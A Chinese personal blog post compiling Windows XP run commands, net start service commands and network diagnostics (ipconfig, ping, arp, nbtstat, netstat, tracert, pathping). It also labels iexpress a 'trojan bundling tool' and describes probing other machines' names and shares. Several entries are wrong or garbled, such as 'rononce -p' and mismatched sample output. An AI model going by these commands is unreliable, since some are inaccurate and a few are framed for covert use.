xueku8
xueku8.wangyou.com

个人资料

主人
xuejiting 视频认证会员
牧羊座  |  25岁  |  浙江省
状态:
鲜花 
收歌 0
献歌 0
鸿热度:星级会员(1)
好友 55
粉丝 5

近期访客

      
日记分类:我的首页    写日记    管理日记    VBscript编程    计算机    英语    电子商务    技术    娱乐

我目前共有 24 篇日记

  • XP里的常用命令提示符

    XP里的常用命令提示符
    cleanmgr-------垃圾整理
    compmgmt.msc---计算机管理 
    conf-----------启动
    charmap--------启动字符映射表 
    calc-----------启动计算器 
    chkdsk.exe-----Chkdsk磁盘检查
    devmgmt.msc--- 设备管理器
    diskmgmt.msc---磁盘管理实用程序
    dfrg.msc-------磁盘碎片整理程序
    drwtsn32------ 系统医生
    dxdiag---------检查DirectX信息
    explorer-------打开资源管理器
    gpedit.msc-----组策略
    Nslookup-------IP地址侦测器
    logoff---------注销命令
    lusrmgr.msc----本机用户和组 
    mem.exe--------显示内存使用情况
    Msconfig.exe---系统配置实用程序
    net start messenger----开始信使服务
    net stop messenger-----停止信使服务
    netmeeting dvdplay--------DVD播放器
    notepad--------打开记事本
    oobe/msoobe /a----检查XP是否激活 
    progman--------程序管理器 
    perfmon.msc----计算机性能监测程序
    regsvr32 /u *.dll----停止dll文件运行
    rononce -p ----15秒关机 
    regedt32-------注册表编辑器 
    rsop.msc-------组策略结果集 
    regedit.exe----注册表 
    sndrec32-------录音机
    services.msc---本地服务设置
    sfc /scannow-----扫描错误并复原
    taskmgr-----任务管理器(2000/xp/2003)
    tsshutdn-------60秒倒计时关机命令
    winmsd---------系统信息
    winchat--------XP自带局域网聊天
    winver---------检查Windows版本 
    在命令提示符下可以利用net start和net stop  来开启和关闭服务。
    net start alerter               /启动报警服务/
    net start "client service for net ware"    /启动netware服务/ 
    net start "clipbook server"      /启动剪切簿服务/
    net start "compute browser"      /启动计算机浏览器服务/
    net start "dhcp client"      /启动dhcp客户服务/
    net start "directory replicator"   /启动目录复制程序 ,将指定的文件复制到服务器上/
    net start eventlog            /启动事件日志服务,用于记录本地计算机上的事件/
    net start "file server for macintosh"   /启动macintosh服务,允许使用计算机共享文件/
    net start "ftp publishing service"    /启动ftp服务,在安装了internet信息服务才可用/
    net start "gateway service for netware"  /启动netware网关服务 在安装netware网关服务可用/
    net start lpdsvc /启动tcpip打印机服务/
    net start messenger /器东 信使 服务,向计算机发送消息/
    net start "microsoft dhcp service" /启动microsoft dhcp/
    net start "net logon"  /启动网络登陆服务/
    net start "network dde" /启动网络 DDE服务/
    net start "ntlm security support provider" /启动ntlm安全支持提供服务/
    net start ole  /启动对象连接嵌入服务/
    net start "print server for macintosh" /启动macintosh打印服务器服务/
    net start "remote access connection manager"  /启动远程访问连接管理服务/
    net start "remote access isnsap service" /启动访问isnsap服务,在安装远程访问服务/
    net start "remote procedure call (rpc) locator" /启动ppc定位器服务/
    net start "remote procedure call (rpc) service" /启动远程过程调用(rpc)服务/
    net start schedule  /启动计划任务服务/
    net start server /启动服务器服务,可以使用硬盘资源共享/
    net start "simple tcp/ip servicer" /启动简单tcp/ip服务/
    net start "site server ldap service" /启动 site server ldap服务/
    net start snmp /启动snmp服务,向snmp管理系统报告当前状态/
    net start "remote registry" /启动远程注册表服务/
    net start spooler /启动后台打印机程序/ 
    net start "tcp/ip netbios helper" /在tcp服务上启用netbios支持/
    net start ups /启动不间断电源ups服务/
    net start "windows internet name service" /启动windows internet服务/
    net start workstation  /启动工作站服务,工作站服务是用计算机可以直接使用网络资源/
    net start telnet /启动telnet 服务,打开23端口/
    net start lanmanserver /打开ipc服务/
    net start msftpsvc /打开ftp命令/ 
    net start termservice /启动win2k的终端控制/
    net start smtpsvc /启动smtp日志记录/
    Windows网络命令行程序 
    使用 ipconfig /all 查看配置 
    使用 ipconfig /renew 刷新配置 
    使用 ipconfig 管理 DNS 和 DHCP 类别 ID 
    使用 Ping 测试连接 
    使用 Arp 解决硬件地址问题 
    使用 nbtstat 解决 NetBIOS 名称问题 
    使用 netstat 显示连接统计 
    使用 tracert 跟踪网络连接 
    使用 pathping 测试路由器 
    使用 ipconfig /all 查看配置 
    发现和解决 TCP/IP 网络问题时,先检查出现问题的计算机上的 TCP/IP 配置。可以 
    使用 ipconfig 命令获得主机配置信息,包括 IP 地址、子网掩码和默认网关。 
    注意 

    对于 Windows 95 和 Windows 98 的客户机,请使用 winipcfg 命令而不是 ipconfi 
    g 命令。 
    使用带 /all 选项的 ipconfig 命令时,将给出所有接口的详细配置报告,包括任何 
    已配置的串行端口。使用 ipconfig /all,可以将命令输出重定向到某个文件,并将 
    输出粘贴到其他文档中。也可以用该输出确认网络上每台计算机的 TCP/IP 配置,或 
    者进一步调查 TCP/IP 网络问题。 

    例如,如果计算机配置的 IP 地址与现有的 IP 地址重复,则子网掩码显示为 0.0.0 
    .0。 
    下面的范例是 ipconfig /all 命令输出,该计算机配置成使用 DHCP 服务器动态配置 
    TCP/IP,并使用 WINS 和 DNS 服务器解析名称。 

    Windows 2000 IP Configuration 

    Node Type.. . . . . . . . : Hybrid 
    IP Routing Enabled.. . . . : No 
    WINS Proxy Enabled.. . . . : No 

    Ethernet adapter Local Area Connection: 

    Host Name.. . . . . . . . : corp1.microsoft.com 
    DNS Servers . . . . . . . : 10.1.0.200 
    Description. . . . . . . : 3Com 3C90x Ethernet Adapter 
    Physical Address. . . . . : 00-60-08-3E-46-07 
    DHCP Enabled.. . . . . . . : Yes 
    Autoconfiguration Enabled.: Yes 
    IP Address. . . . . . . . . : 192.168.0.112 
    Subnet Mask. . . . . . . . : 255.255.0.0 
    Default Gateway. . . . . . : 192.168.0.1 
    DHCP Server. . . . . . . . : 10.1.0.50 
    Primary WINS Server. . . . : 10.1.0.101 
    Secondary WINS Server. . . : 10.1.0.102 
    Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM 
    Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM 



    如果 TCP/IP 配置没有问题,下一步测试能够连接到 TCP/IP 网络上的其他主机。 

    使用 ipconfig /renew 刷新配置 
    解决 TCP/IP 网络问题时,先检查遇到问题的计算机上的 TCP/IP 配置。如果计算机 
    启用 DHCP 并使用 DHCP 服务器获得配置,请使用 ipconfig /renew 命令开始刷新租 
    约。 

    使用 ipconfig /renew 时,使用 DHCP 的计算机上的所有网卡(除了那些手动配置的 
    适配器)都尽量连接到 DHCP 服务器,更新现有配置或者获得新配置。 

    也可以使用带 /release 选项的 ipconfig 命令立即释放主机的当前 DHCP 配置。有 
    关 DHCP 和租用过程的详细信息,请参阅客户机如何获得配置。 

    注意 

    对于启用 DHCP 的 Windows 95 和 Windows 98 客户,请使用 winipcfg 命令的 rel 
    ease 和 renew 选项,而不是 ipconfig /release 和 ipconfig /renew 命令,手动 
    释放或更新客户的 IP 配置租约。 
    使用 ipconfig 管理 DNS 和 DHCP 类别 ID 
    也可以使用 ipconfig 命令: 

    显示或重置 DNS 缓存。 
    详细信息,请参阅使用 ipconfig 查看或重置客户解析程序缓存。 

    刷新已注册的 DNS 名称。 
    详细信息,请参阅使用 ipconfig 更新 DNS 客户注册。 

    显示适配器的 DHCP 类别 ID。 
    详细信息,请参阅显示客户机上的 DHCP 类别 ID 信息。 

    设置适配器的 DHCP 类别 ID。 
    详细信息,请参阅设置客户机上的 DHCP 类别 ID 信息。 

    使用 Ping 测试连接 
    Ping 命令有助于验证 IP 级的连通性。发现和解决问题时,可以使用 Ping 向目标主 
    机名或 IP 地址发送 ICMP 回应请求。需要验证主机能否连接到 TCP/IP 网络和网络 
    资源时,请使用 Ping。也可以使用 Ping 隔离网络硬件问题和不兼容配置。 

    通常最好先用 Ping 命令验证本地计算机和网络主机之间的路由是否存在,以及要连 
    接的网络主机的 IP 地址。Ping 目标主机的 IP 地址看它是否响应,如下: 

    ping IP_address 

    使用 Ping 时应该执行以下步骤: 

    Ping 环回地址验证是否在本地计算机上安装 TCP/IP 以及配置是否正确。 
    ping 127.0.0.1 

    Ping 本地计算机的 IP 地址验证是否正确地添加到网络。 
    ping IP_address_of_local_host 

    Ping 默认网关的 IP 地址验证默认网关是否运行以及能否与本地网络上的本地主机通 
    讯。 
    ping IP_address_of_default_gateway 

    Ping 远程主机的 IP 地址验证能否通过路由器通讯。 
    ping IP_address_of_remote_host 

    Ping 命令用 Windows 套接字样式的名称解析将计算机名解析成 IP 地址,所以如果 
    用地址成功,但是用名称 Ping 失败,则问题出在地址或名称解析上,而不是网络连 
    通性的问题。详细信息,请参阅使用 Arp 解决硬件地址问题。 

    如果在任何点上都无法成功地使用 Ping,请确认: 

    安装和配置 TCP/IP 之后重新启动计算机。 
    “Internet 协议 (TCP/IP) 属性”对话框“常规”选项卡上的本地计算机的 IP 地址 
    有效而且正确。 
    启用 IP 路由,并且路由器之间的链路是可用的。 
    您可以使用 Ping 命令的不同选项来指定要使用的数据包大小、要发送多少数据包、 
    是否记录用过的路由、要使用的生存时间 (TTL) 值以及是否设置“不分段”标志。可 
    以键入 ping -? 查看这些选项。 

    下例说明如何向 IP 地址 172.16.48.10 发送两个 Ping,每个都是 1,450 字节: 

    C:>ping -n 2 -l 1450 172.16.48.10 
    Pinging 172.16.48.10 with 1450 bytes of data: 

    Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32 
    Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32 

    Ping statistics for 157.59.8.1: 
    Packets:Sent = 2, Received = 2, Lost = 0 (0% loss), 
    Approximate roundtrip times in milli-seconds: 
    Minimum = 0ms, Maximum = 10ms, Average = 2ms 
    默认情况下,在显示“请求超时”之前,Ping 等待 1,000 毫秒(1 秒)的时间让每个响应返回。如果通过 Ping 探测的远程系统经过长时间延迟的链路,如卫星链路,则响应可能会花更长的时间才能返回。可以使用 -w (等待)选项指定更长时间的超时。 

    使用 Arp 解决硬件地址问题 
    “地址解析协议 (ARP)”允许主机查找同一物理网络上的主机的媒体访问控制地址,如果给出后者的 IP 地址。为使 ARP 更加有效,每个计算机缓存 IP 到媒体访问控制地址映射消除重复的 ARP 广播请求。 

    可以使用 arp 命令查看和修改本地计算机上的 ARP 表项。arp 命令对于查看 ARP 缓存和解决地址解析问题非常有用。 

    详细信息,请参阅查看“地址解析协议 (ARP)”缓存和添加静态 ARP 缓存项目。 

    使用 nbtstat 解决 NetBIOS 名称问题 
    TCP/IP 上的 NetBIOS (NetBT) 将 NetBIOS 名称解析成 IP 地址。TCP/IP 为 NetBIOS 名称解析提供了很多选项,包括本地缓存搜索、WINS 服务器查询、广播、DNS 服务器查询以及 Lmhosts 和主机文件搜索。 

    Nbtstat 是解决 NetBIOS 名称解析问题的有用工具。可以使用nbtstat 命令删除或更正预加载的项目: 

    nbtstat -n 显示由服务器或重定向器之类的程序在系统上本地注册的名称。 
    nbtstat -c 显示 NetBIOS 名称缓存,包含其他计算机的名称对地址映射。 
    nbtstat -R 清除名称缓存,然后从 Lmhosts 文件重新加载。 
    nbtstat -RR 释放在 WINS 服务器上注册的 NetBIOS 名称,然后刷新它们的注册。 
    nbtstat -a name 对 name 指定的计算机执行 NetBIOS 适配器状态命令。适配器状态命令将返回计算机的本地 NetBIOS 名称表,以及适配器的媒体访问控制地址。 
    nbtstat -S 列出当前的 NetBIOS 会话及其状态(包括统计),如下例所示: 
    NetBIOS connection table 

    Local name State In/out Remote Host Input Output 
    ------------------------------------------------------------------ 
    CORP1 <00> Connected Out CORPSUP1<20> 6MB 5MB 
    CORP1 <00> Connected Out CORPPRINT<20> 108KB 116KB 
    CORP1 <00> Connected Out CORPSRC1<20> 299KB 19KB 
    CORP1 <00> Connected Out CORPEMAIL1<20> 324KB 19KB 
    CORP1 <03> Listening 
    使用 netstat 显示连接统计 
    可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。下面是 netstat 的输出示例: 

    C:>netstat -e 
    Interface Statistics 

    Received Sent 
    Bytes 3995837940 47224622 
    Unicast packets 120099 131015 
    Non-unicast packets 7579544 3823 
    Discards 0 0 
    Errors 0 0 
    Unknown protocols 363054211 

    C:>netstat -a 

    Active Connections 

    Proto Local Address Foreign Address State 
    TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED 
    TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED 
    TCP CORP1:1606 172.16.105.245:nbsession ESTABLISHED 
    TCP CORP1:1632 172.16.48.213:nbsession ESTABLISHED 
    TCP CORP1:1659 172.16.48.169:nbsession ESTABLISHED 
    TCP CORP1:1714 172.16.48.203:nbsession ESTABLISHED 
    TCP CORP1:1719 172.16.48.36:nbsession ESTABLISHED 
    TCP CORP1:1241 172.16.48.101:nbsession ESTABLISHED 
    UDP CORP1:1025 *:* 
    UDP CORP1:snmp *:* 
    UDP CORP1:nbname *:* 
    UDP CORP1:nbdatagram *:* 
    UDP CORP1:nbname *:* 
    UDP CORP1:nbdatagram *:* 

    C:>netstat -s 
    IP Statistics 

    Packets Received = 5378528 
    Received Header Errors = 738854 
    Received Address Errors = 23150 
    Datagrams Forwarded = 0 
    Unknown Protocols Received = 0 
    Received Packets Discarded = 0 
    Received Packets Delivered = 4616524 
    Output Requests = 132702 
    Routing Discards = 157 
    Discarded Output Packets = 0 
    Output Packet No Route = 0 
    Reassembly Required = 0 
    Reassembly Successful = 0 
    Reassembly Failures = 
    Datagrams Successfully Fragmented = 0 
    Datagrams Failing Fragmentation = 0 
    Fragments Created = 0 

    ICMP Statistics 
    Received Sent 
    Messages 693 4 
    Errors 0 0 
    Destination Unreachable 685 0 
    Time Exceeded 0 0 
    Parameter Problems 0 0 
    Source Quenches 0 0 
    Redirects 0 0 
    Echoes 4 0 
    Echo Replies 0 4 
    Timestamps 0 0 
    Timestamp Replies 0 0 
    Address Masks 0 0 
    Address Mask Replies 0 0 

    TCP Statistics 

    Active Opens = 597 
    Passive Opens = 135 
    Failed Connection Attempts = 107 
    Reset Connections = 91 
    Current Connections = 8 
    Segments Received = 106770 
    Segments Sent = 118431 
    Segments Retransmitted = 461 

    UDP Statistics 

    Datagrams Received = 4157136 
    No Ports = 351928 
    Receive Errors = 2 
    Datagrams Sent = 13809 

    使用 tracert 跟踪网络连接 
    Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 

    Tracert 工作原理 
    通过向目标发送不同 IP 生存时间 (TTL) 值的“Internet 控制消息协议 (ICMP)”回应数据包,Tracert 诊断程序确定到目标所采取的路由。要求路径上的每个路由器在转发数据包之前至少将数据包上的 TTL 递减 1。数据包上的 TTL 减为 0 时,路由器应该将“ICMP 已超时”的消息发回源系统。 

    Tracert 先发送 TTL 为 1 的回应数据包,并在随后的每次发送过程将 TTL 递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。通过检查中间路由器发回的“ICMP 已超时”的消息确定路由。某些路由器不经询问直接丢弃 TTL 过期的数据包,这在Tracert 实用程序中看不到。 

    Tracert 命令按顺序打印出返回“ICMP 已超时”消息的路径中的近端路由器接口列表。如果使用 -d 选项,则 Tracert 实用程序不在每个 IP 地址上查询 DNS。 

    在下例中,数据包必须通过两个路由器(10.0.0.1 和 192.168.0.1)才能到达主机 
    172.16.0.99。主机的默认网关是 10.0.0.1,192.168.0.0 网络上的路由器的 IP 地 
    址是 192.168.0.1。 

    C:>tracert 172.16.0.99 -d 
    Tracing r

    oute to 172.16.0.99 over a maximum of 30 hops 
    1 2s 3s 2s 10,0.0,1 
    2 75 ms 83 ms 88 ms 192.168.0.1 
    3 73 ms 79 ms 93 ms 172.16.0.99 
    Trace complete. 
    用 tracert 解决问题 
    可以使用 tracert 命令确定数据包在网络上的停止位置。下例中,默认网关确定 19 
    2.168.10.99 主机没有有效路径。这可能是路由器配置的问题,或者是 192.168.10. 
    0 网络不存在(错误的 IP 地址)。 

    C:>tracert 192.168.10.99 

    Tracing route to 192.168.10.99 over a maximum of 30 hops 

    1 10.0.0.1 reportsestination net unreachable. 

    Trace complete. 

    Tracert 实用程序对于解决大网络问题非常有用,此时可以采取几条路径到达同一个 
    点。 

    Tracert 命令行选项 
    Tracert 命令支持多种选项,如下表所示。 

    tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name 

    选项 描述 
    -d 指定不将 IP 地址解析到主机名称。 
    -h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。 
    -j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。 
    -w timeout 等待 timeout 为每次回复所指定的毫秒数。 
    target_name 目标主机的名称或 IP 地址。 

    详细信息,请参阅使用 tracert 命令跟踪路径。 

    使用 pathping 测试路由器 
    pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。某些选项是可用的,如下表所示。 

    选项 名称 功能 
    -n Hostnames 不将地址解析成主机名。 
    -h Maximum hops 搜索目标的最大跃点数。 
    -g Host-list 沿着路由列表释放源路由。 
    -p Period 在 ping 之间等待的毫秒数。 
    -q Num_queries 每个跃点的查询数。 
    -w Time-out 为每次回复所等待的毫秒数。 
    -T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。 
    -R RSVP isbase Che检查以确定路径中的每个路由器是否支持“资源保留协议 (RSVP)”,此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连通性。 

    默认的跃点数是 30,并且超时前的默认等待时间是 3 秒。默认时间是 250 毫秒,并且沿着路径对每个路由器进行查询的次数是 100。 

    以下是典型的 pathping 报告。跃点列表后所编辑的统计信息表明在每个独立路由器上数据包丢失的情况。 



    D:> pathping -n msw 

    Tracing route to msw [7.54.1.196] 
    over a maximum of 30 hops: 
    0 172.16.87.35 
    1 172.16.87.218 
    2 192.68.52.1 
    3 192.68.80.1 
    4 7.54.247.14 
    5 7.54.1.196 

    Computing statistics for 125 seconds... 
    Source to Here This Node/Link 
    Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address 
    0 172.16.87.35 
    0/ 100 = 0% | 
    1 41ms 0/ 100 = 0% 0/ 100 = 0% 172.16.87.218 
    13/ 100 = 13% | 
    2 22ms 16/ 100 = 16% 3/ 100 = 3% 192.68.52.1 
    0/ 100 = 0% | 
    3 24ms 13/ 100 = 13% 0/ 100 = 0% 192.68.80.1 
    0/ 100 = 0% | 
    4 21ms 14/ 100 = 14% 1/ 100 = 1% 10.54.247.14 
    0/ 100 = 0% | 
    5 24ms 13/ 100 = 13% 0/ 100 = 0% 10.54.1.196 

    Trace complete. 

    当运行 pathping 时,在测试问题时首先查看路由的结果。此路径与 tracert 命令所显示的路径相同。然后 pathping 命令对下一个 125 毫秒显示忙消息(此时间根据跃点计数变化)。在此期间,pathping 从以前列出的所有路由器和它们之间的链接之间收集信息。在此期间结束时,它显示测试结果。 

    最右边的两栏 This Node/Link Lost/Sent=Pct 和 Address 包含的信息最有用。172.16.87.218(跃点 1)和 192.68.52.1(跃点 2)丢失 13% 的数据包。 所有其他链接工作正常。在跃点 2 和 4 中的路由器也丢失寻址到它们的数据包(如 This Node /Link 栏中所示),但是该丢失不会影响转发的路径。 

    对链接显示的丢失率(在最右边的栏中标记为 |)表明沿路径转发丢失的数据包。该丢失表明链接阻塞。对路由器显示的丢失率(通过最右边栏中的 IP 地址显示)表明这些路由器的 CPU 可能超负荷运行。这些阻塞的路由器可能也是端对端问题的一个因素,尤其是在软件路由器转发数据包时。
    命令提示符大全
    winver---------检查Windows版本 
    wmimgmt.msc----打开windows管理体系结构(WMI) 
    wupdmgr--------windows更新程序 
    wscript--------windows脚本宿主设置 
    write----------写字板 
    winmsd---------系统信息 
    wiaacmgr-------扫描仪和照相机向导 
    winchat--------XP自带局域网聊天 
    mem.exe--------显示内存使用情况 
    Msconfig.exe---系统配置实用程序 
    mplayer2-------简易widnows media player 
    mspaint--------画图板 
    mstsc----------远程桌面连接 
    mplayer2-------媒体播放机 
    magnify--------放大镜实用程序 
    mmc------------打开控制台 
    mobsync--------同步命令 
    dxdiag---------检查DirectX信息 
    drwtsn32------ 系统医生 
    devmgmt.msc--- 设备管理器 
    dfrg.msc-------磁盘碎片整理程序 
    diskmgmt.msc---磁盘管理实用程序 
    dcomcnfg-------打开系统组件服务 
    ddeshare-------打开DDE共享设置 
    dvdplay--------DVD播放器 
    net stop messenger-----停止信使服务 
    net start messenger----开始信使服务 
    notepad--------打开记事本 
    nslookup-------网络管理的工具向导 
    ntbackup-------系统备份和还原 
    narrator-------屏幕“讲述人” 
    ntmsmgr.msc----移动存储管理器 
    ntmsoprq.msc---移动存储管理员操作请求 
    netstat -an----(TC)命令检查接口 
    syncapp--------创建一个公文包 
    sysedit--------系统配置编辑器 
    sigverif-------文件签名验证程序 
    sndrec32-------录音机 
    shrpubw--------创建共享文件夹 
    secpol.msc-----本地安全策略 
    syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 
    services.msc---本地服务设置 
    Sndvol32-------音量控制程序 
    sfc.exe--------系统文件检查器 
    sfc /scannow---windows文件保护 
    tsshutdn-------60秒倒计时关机命令 
    tourstart------xp简介(安装完成后出现的漫游xp程序) 
    taskmgr--------任务管理器 
    eventvwr-------事件查看器 
    eudcedit-------造字程序 
    explorer-------打开资源管理器 

    packager-------对象包装程序 
    perfmon.msc----计算机性能监测程序 
    progman--------程序管理器 
    regedit.exe----注册表 
    rsop.msc-------组策略结果集 
    regedt32-------注册表编辑器 
    rononce -p ----15秒关机 
    regsvr32 /u *.dll----停止dll文件运行 
    regsvr32 /u zipfldr.dll------取消ZIP支持 
    cmd.exe--------CMD命令提示符 
    chkdsk.exe-----Chkdsk磁盘检查 
    certmgr.msc----证书管理实用程序 
    calc-----------启动计算器 
    charmap--------启动字符映射表 
    cliconfg-------SQL SERVER 客户端网络实用程序 
    Clipbrd--------剪贴板查看器 
    conf-----------启动netmeeting 
    compmgmt.msc---计算机管理 
    cleanmgr-------垃圾整理 
    ciadv.msc------索引服务程序 
    osk------------打开屏幕键盘 
    odbcad32-------ODBC数据源管理器 
    oobe/msoobe /a----检查XP是否激活 
    lusrmgr.msc----本机用户和组 
    logoff---------注销命令 

    iexpress-------木马捆绑工具,系统自带 
    Nslookup-------IP地址侦测器 
    fsmgmt.msc-----共享文件夹管理器 
    utilman--------辅助工具管理器 
    gpedit.msc-----组策略 
    网络命令大全
    .最基本,最常用的,测试物理网络的 
    ping 192.168.0.8 -t ,参数-t是等待用户去中断测试 

    2.查看DNS、IP、Mac等 
    A.Win98:winipcfg 
    B.Win2000以上:Ipconfig/all 

    C.NSLOOKUP:如查看河北的DNS 
    C:\>nslookup 
    Default Server: ns.hesjptt.net.cn 
    Address: 202.99.160.68 
    >server 202.99.41.2 则将DNS改为了41.2 
    > pop.pcpop.com 
    Server: ns.hesjptt.net.cn 
    Address: 202.99.160.68 

    Non-authoritative answer: 
    Name: pop.pcpop.com 
    Address: 202.99.160.212 

    3.网络信使 (经常有人问的~) 
    Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段 
    net stop messenger 停止信使服务,也可以在面板-服务修改 
    net start messenger 开始信使服务 

    4.探测对方对方计算机名,所在的组、域及当前用户名 (追捕的工作原理) 
    ping -a IP -t ,只显示NetBios名 
    nbtstat -a 192.168.10.146 比较全的 

    5.netstat -a 显示出你的计算机当前所开放的所有端口 
    netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等 

    6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址 
    arp -a 

    7.在代理服务器端 
    捆绑IP和MAC地址,解决局域网内盗用IP!: 
    ARP -s 192.168.10.59 00 -50-ff-6c-08-75 
    解除网卡的IP与MAC地址的绑定: 
    arp -d 网卡IP 

    8.在网络邻居上隐藏你的计算机 (让人家看不见你!) 
    net config server /hidden:yes 
    net config server /hidden:no 则为开启 

    9.几个net命令 
    A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。 
    比如:查看这个IP上的共享资源,就可以 
    C:\>net view 192.168.10.8 
    在 192.168.10.8 的共享资源 
    资源共享名 类型 用途 注释 
    -------------------------------------- 
    网站服务 Disk 
    命令成功完成。 

    B.查看计算机上的用户帐号列表 net user 
    C.查看网络链接 net use 
    例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘 

    D.记录链接 net session 
    例如: 
    C:\>net session 
    计算机 用户名 客户类型 打开空闲时间 
    ------------------------------------------------------------------------------- 
    \\192.168.10.110 ROME Windows 2000 2195 0 00:03:12 

    \\192.168.10.51 ROME Windows 2000 2195 0 00:00:39 
    命令成功完成。 

    10.路由跟踪命令 
    A.tracert pop.pcpop.com 
    B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的% 
    11.关于共享安全的几个命令 
    A.查看你机器的共享资源 net share 
    B.手工删除共享(可以编个bat文件,开机自运行,把共享都删了!) 
    net share c$ /d 
    net share d$ /d 
    net share ipc$ /d 
    net share admin$ /d 
    注意$后有空格。 
    C.增加一个共享: 
    c:\net share mymovie=e:\downloads\movie /users:1 
    mymovie 共享成功。 
    同时限制链接用户数为1人。 

    12.在DOS行下设置静态IP 
    A.设置静态IP 
    CMD 
    netsh 
    netsh>int 
    interface>ip 
    interface ip>set add "本地链接" static IP地址 mask gateway 
    B.查看IP设置 
    interface ip>show address 

    Arp 
    显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。 

    语法 
    arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]] 

    参数 
    -a [InetAddr] [-N IfaceAddr] 
    显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。 
    -g [InetAddr] [-N IfaceAddr] 
    与 -a 相同。 
    -d InetAddr [IfaceAddr] 
    删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。 
    -s InetAddr EtherAddr [IfaceAddr] 
    向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。 
    /? 
    在命令提示符显示帮助。 
    注释 
    InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。 
    物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。 
    通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。 
    只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 
    范例 
    要显示所有接口的 ARP 缓存表,可键入: 

    arp -a 

    对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入: 

    arp -a -N 10.0.0.99 

    要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入: 

    arp -s 10.0.0.80 00-AA-00-4F-2A-9C 

    At 
    计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。 

    语法 
    at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}] 

    at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command] 

    参数 
    \\computername 
    指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。 
    ID 
    指定指派给已计划命令的识别码。 
    /delete 
    取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。 
    /yes 
    删除已计划的事件时,对来自系统的所有询问都回答“是”。 
    hours:minutes 
    指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。 
    /interactive 
    对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。 
    /every: 
    在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。 
    date 
    指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。 
    /next: 
    在下一个指定日期(比如,下一个星期四)到来时运行 command。 
    command 
